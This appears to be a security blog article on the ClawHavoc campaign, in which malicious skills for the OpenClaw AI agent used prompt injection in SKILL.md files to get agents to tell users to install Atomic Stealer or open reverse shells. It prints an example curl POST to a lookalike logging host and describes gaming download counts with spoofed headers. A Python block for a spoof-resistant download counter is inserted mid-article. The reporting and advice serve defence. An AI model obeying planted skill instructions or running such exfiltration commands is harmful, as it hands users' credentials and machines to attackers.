The #1 Most Downloaded AI Skill Was Malware. Here's How 1,184 Poisoned Packages Slipped Past Everyone.

The ClawHavoc campaign is the most alarming AI supply chain attack to date — and most people still don't know it happened.


It started with a butler joke.

Imagine you hire a brilliant personal assistant. He manages your calendar, reads your messages, runs errands on your behalf. He has keys to everything — because that's what you hired him to do. Now imagine you come home one day to find the front door wide open, and your butler cheerfully serving tea to a stranger who wandered in off the street.

That's not a thought experiment. That's what happened to thousands of OpenClaw users in January and February 2026 — and the attacker left a receipt.

What Is OpenClaw?

OpenClaw (formerly Clawdbot, then Moltbot) is an open-source AI agent framework that's taken the developer community by storm. It racked up 145,000 GitHub stars in a matter of weeks, attracted 2 million visitors in a single week, and became one of the most viral AI projects of 2026.

The pitch is compelling. OpenClaw connects large language models — Claude, GPT, DeepSeek — to a persistent execution environment that can read your files, run terminal commands, send messages across Telegram, Slack, Discord, and WhatsApp, manage your calendar, browse the web, and remember everything across sessions. It's an autonomous digital employee running 24/7 on your machine.

The power comes from the architecture. OpenClaw agents operate with broad system permissions — full disk access, terminal access, OAuth tokens to every service you've connected. That's by design. You can't have a useful autonomous agent without giving it capability.

But capability without security is an open door. And the attackers walked right through it.


ClawHub: npm for AI Agents

To extend what OpenClaw can do, users install "skills" — modular packages from ClawHub, the official community marketplace. Think of it exactly like npm for JavaScript, or PyPI for Python. Want your agent to track crypto wallets? There's a skill. Summarize YouTube videos? Skill. Trade on Polymarket, pull Google Calendar, scrape X? Skills, skills, skills.

The value proposition is obvious. Install a package, gain a superpower. The whole ecosystem is one command: clawhub install skill-name.

And therein lies the problem.

ClawHub allowed anyone to publish a skill. The only restriction: your GitHub account needed to be at least one week old. That's it. No code review. No static analysis. No vetting of what those skills actually instruct the AI to do.

The attackers noticed.


ClawHavoc: How 1,184 Malicious Skills Flooded the Marketplace

Security researchers at Koi Security conducted a full audit of ClawHub in late January 2026. Of 2,857 skills available at the time, they identified 341 malicious entries. Of those, 335 were traced to a single coordinated campaign — now tracked as ClawHavoc.

The number kept climbing. By February 16, 2026, updated scans confirmed over 824 malicious skills across an expanded registry of 10,700+ packages. Bitdefender's independent analysis placed the figure closer to 900 — roughly 20% of the entire ecosystem. The most comprehensive count, from Cyberpress, reached 1,184 confirmed malicious skills.

One attacker, operating under the handle Hightower6eu, uploaded a staggering 354 malicious packages alone. Other actors used automated deployment scripts — Sakaen736jih was observed submitting new malicious skills every few minutes. Some used compromised legitimate GitHub accounts to add an air of authenticity. The handle aslaep123 was a deliberate typosquat of the legitimate user asleep123.

This wasn't opportunistic. This was an organized operation.


The Attack Chain: How Your AI Agent Was Turned Against You

The ClawHavoc playbook is elegant in its simplicity. Here's how it worked, step by step.

Step 1: The Poisoned SKILL.md

Every OpenClaw skill contains a SKILL.md file — the manifest the AI reads to understand what the skill does and how to execute it. Legitimate skills use this to define behavior. Malicious skills weaponized it.

Attackers crafted professional-looking documentation for skills disguised as high-demand tools:

  • solana-wallet-tracker
  • youtube-summarize-pro
  • polymarket-trader
  • polymarket-all-in-one
  • yahoo-finance-pro
  • x-trends-tracker
  • gmail-manager
  • auto-updater-agent

The documentation looked legitimate. The category fit user demand. The README was polished. Nothing looked wrong on the surface — because the ClawHub UI only shows users the visible SKILL.md content. Referenced files, hidden logic files, and additional payloads don't surface in the web interface.

The AI reads everything. Users typically read none of it.

Step 2: Social Engineering via "Prerequisites"

The SKILL.md files included a "Prerequisites" section with a ClickFix-style prompt. The AI agent was instructed to tell users something like this:

"To enable this feature, please run:"

That single command — piped directly to bash — was the payload delivery mechanism. On macOS, it installed Atomic Stealer (AMOS), one of the most capable credential-theft tools currently in circulation.

Step 3: The Harvest

Once Atomic Stealer landed, it went to work immediately. It extracted:

  • Browser passwords and cookies from Chrome, Safari, Firefox, and Brave
  • SSH keys from ~/.ssh/
  • Telegram session files
  • Crypto wallet credentials and seed phrases
  • The entire macOS Keychain
  • Every API key stored in .env files
  • OpenClaw's own configuration file at ~/.clawdbot/.env, containing API keys for every connected service

On other systems, some skills skipped the stealer entirely and opened a reverse shell — giving the attacker full remote control over the victim's machine. Persistent. Silent. Invisible to the user. One skill, operating as a fake Polymarket bot, established an interactive shell back to the attacker's server and maintained it indefinitely.

A fake "weather assistant" skill, flagged separately, exfiltrated the OpenClaw .env configuration file to a webhook.site endpoint. Those API keys then gave attackers full remote control over the victim's entire OpenClaw deployment and every service connected to it.


The #1 Downloaded Skill Was Scanned by Cisco. Here's What They Found.

Before ClawHavoc was even named, independent researcher Jamieson O'Reilly published a two-part investigation demonstrating exactly how the trust model could be exploited. In a widely-read thread (860K views), he described creating a backdoored skill called "What Would Elon Do?" (/wed), gaming it to the #1 position on ClawHub by exploiting a trivially unauthenticated download counter with spoofed X-Forwarded-For headers, and watching as 16 real developers in 7 countries executed arbitrary commands on their machines within 8 hours.

O'Reilly's proof-of-concept was deliberately benign — a ping to a server he controlled, proving execution without stealing anything. But it was the principle he was demonstrating, not the payload.

"In the hands of someone less scrupulous, those developers would have had their SSH keys, AWS credentials, and entire codebases exfiltrated before they knew anything was wrong."

Part I | Part II

When Cisco's AI Defense team ran their Skill Scanner against the #1 ranked skill on ClawHub — the "What Would Elon Do?" skill that had been gamed to the top position — they found 9 security vulnerabilities. Two were critical. The skill silently exfiltrated data to attacker-controlled servers and used direct prompt injection to bypass safety guidelines. It had been downloaded thousands of times.


Why the Permission Model Doesn't Protect You

OpenClaw shows users a permission prompt before executing commands:

Claude wants to run: curl -s -X POST "https://clawdhub-skill.com/log" ...
[Allow] [Deny]

In theory, users can inspect each command and deny suspicious ones. In practice, this model fails for several reasons that are worth understanding.

Every useful interaction requires Allow clicks. After 50 legitimate approvals in a session, the 51st gets no scrutiny. The skill author controls what appears in the prompt — the command shown is exactly what they chose to display. A curl to a domain containing "clawhub" looks like telemetry for a skill you just installed. whoami or hostname looks routine. Users have no baseline to distinguish expected behavior from intrusion.

The combined effect: a permission model that creates an illusion of control while providing almost none.


This Is npm 2018 All Over Again — Except the Package Can Think

If you've followed security news for more than a few years, the pattern is familiar.

In 2018, an attacker gained maintainer access to event-stream, a JavaScript package with 1.5 million weekly downloads, and hid a malicious dependency inside it for months. In October 2021, ua-parser-js — with over 7 million weekly downloads and used by Facebook's own fbjs package — was compromised when attackers hijacked the maintainer's account and published versions containing cryptominers and credential stealers.

The same dynamics apply to ClawHub. Except there's a critical difference.

When a malicious npm package runs, it executes code. When a malicious ClawHub skill runs, it instructs an AI agent with autonomous decision-making capability and broad system access to execute code — and the AI has already been granted full disk access, terminal permissions, and OAuth tokens to your email, calendar, messaging apps, and cloud services.

The package can think. It has root access to your life. And it was installed voluntarily because the download count said 4,000+ and the README looked professional.

As IBM Research Scientist Kaoutar El Maghraoui put it: "A highly capable agent without proper safety controls can end up creating major vulnerabilities, especially if it is used in a work context."


The Enterprise Problem Nobody Is Talking About

Bitdefender's telemetry surfaced something deeply uncomfortable: OpenClaw isn't just a personal tinkering tool anymore. Employees are deploying it on corporate machines — using single-line install commands, granting full disk access to bypass setup friction, and connecting it to corporate Slack, Gmail, and cloud infrastructure.

Shadow AI. Broad permissions. Malicious skills in the marketplace.

The attack surface writes itself.

Microsoft's security blog put it plainly: installing a ClawHub skill is functionally equivalent to installing privileged code on a machine. Treating it as anything less is a miscalculation.


The Structural Problem

The ClawHavoc campaign is notable not for technical sophistication but for exposing fundamental architectural weaknesses that patches alone won't fix.

No content vetting. Skills can instruct Claude to do anything. There is no static analysis, no behavioral sandbox, no review process. Whatever markdown you upload becomes instructions the AI will follow.

Trust signals are manufactured. Download counts were trivially inflatable via the unauthenticated endpoint. Publisher identity required only a week-old GitHub account. Popularity and legitimacy are indistinguishable from fraud.
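What a download counter that resists the spoofing described above could look like. This is an added example, not ClawHub's code: it assumes a single trusted reverse proxy in 10.0.0.0/8 that appends the real client address as the last X-Forwarded-For hop, counts at most one anonymous install per skill per client address, and counts authenticated installs once per account.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumption: the registry sits behind one reverse proxy in this range, so
# X-Forwarded-For is honoured only when the TCP peer is that proxy.
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]


def client_ip(peer_ip, headers):
    """Resolve the client address without trusting a spoofable header.

    Only the right-most X-Forwarded-For hop is appended by our own proxy;
    anything to its left was supplied by the client and may be forged.
    """
    xff = headers.get("X-Forwarded-For")
    if xff and any(ip_address(peer_ip) in net for net in TRUSTED_PROXIES):
        return xff.split(",")[-1].strip()
    return peer_ip


class InstallCounter:
    """Per-skill install counts: one per authenticated account, and anonymous
    installs capped per resolved client address instead of counted as-is."""

    def __init__(self, anon_cap_per_ip=1):
        self.by_account = defaultdict(set)                        # slug -> {account}
        self.anon_by_ip = defaultdict(lambda: defaultdict(int))   # slug -> ip -> n
        self.cap = anon_cap_per_ip

    def record(self, slug, peer_ip, headers, account=None):
        """Return True if the install was counted, False if it was discarded."""
        if account:
            self.by_account[slug].add(account)   # repeats from one account collapse
            return True
        ip = client_ip(peer_ip, headers)
        if self.anon_by_ip[slug][ip] >= self.cap:
            return False                         # repeat anonymous install, ignored
        self.anon_by_ip[slug][ip] += 1
        return True

    def count(self, slug):
        return len(self.by_account[slug]) + sum(self.anon_by_ip[slug].values())
```

With this, a flood of requests from one address carrying different forged X-Forwarded-For values moves the count by exactly one.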

The UI hides what matters. ClawHub's web interface surfaces the visible SKILL.md content. Referenced files — where the actual payload logic lives — stay hidden. Users would need to manually inspect installed skill directories to see what they're actually running. History suggests almost nobody does.

OpenClaw's creator Peter Steinberger has since added a community reporting feature (skills with 3+ unique reports are auto-hidden) and, as of February 14, 2026, announced he's joining OpenAI, with the project continuing as the OpenClaw Foundation backed by OpenAI's financial and technical support. Multiple CVEs have been patched (CVE-2026-25253, CVE-2026-25157, CVE-2026-24763, CVE-2026-25593, CVE-2026-25475). The latest version as of this writing is 2026.2.17 with no known unfixed CVEs.

But the architecture still places enormous trust in community content with minimal verification infrastructure. That's a policy problem, not just a bug.


What You Should Do Right Now

If you use OpenClaw:

  1. Rotate every credential that OpenClaw has ever had access to. API keys, OAuth tokens, bot credentials, everything.
  2. Check ~/.clawdbot/.env and verify it hasn't been exfiltrated.
  3. Audit ~/.claude/skills/ — read every file in every installed skill directory. Search for curl, wget, bash, and backtick commands.
  4. Look for unusual processes, cron jobs, entries in ~/.ssh/authorized_keys, or outbound connections to webhook.site or unknown domains.
  5. Treat download counts as meaningless. Stars and installs from authenticated users are marginally better signals. The reputation of the publisher matters more than any ranking.
  6. Never copy-paste terminal commands from a skill's documentation or README without understanding exactly what they do.

If you run enterprise infrastructure:

Block clawhub install on corporate devices until you have visibility into what's being installed. Monitor for process execution patterns consistent with OpenClaw. Microsoft's security blog provides KQL hunt queries for detecting ClawHub skill installs and surfacing rare skill slugs across your environment.

Alex Polyakov of Adversa AI has released SecureClaw, a free open-source tool that runs 55 automated audit and hardening checks against OpenClaw deployments, mapped to OWASP Agentic Security Initiative categories and MITRE ATLAS. It's available on GitHub and currently the most comprehensive defensive tooling purpose-built for this threat model.


The Bigger Picture

The butler is brilliant. He's not going away. The economics of autonomous AI agents make widespread adoption inevitable regardless of the security tradeoffs involved.

But we are rushing headfirst into a world where autonomous systems with significant capabilities — full disk access, shell execution, OAuth tokens to every connected service — are extended through community marketplaces with the same trust model as a free app store. The patterns that plagued npm for a decade are now operating inside tools that can think, decide, and act on your behalf.

The supply chain attack is the same. The blast radius is orders of magnitude larger.

If you're running agent infrastructure, the question isn't whether to use it. It's whether your security posture has caught up to what you've already deployed.

Check what's actually running. Audit what you've installed. Understand what you've traded away.

The front door might already be open.


Sources: Koi Security / The Hacker News, Bitdefender Labs, Cyberpress, SecurityWeek, Microsoft Security Blog, Conscia, Cisco Talos, eSecurity Planet, AuthMind, Jamieson O'Reilly @theonejvo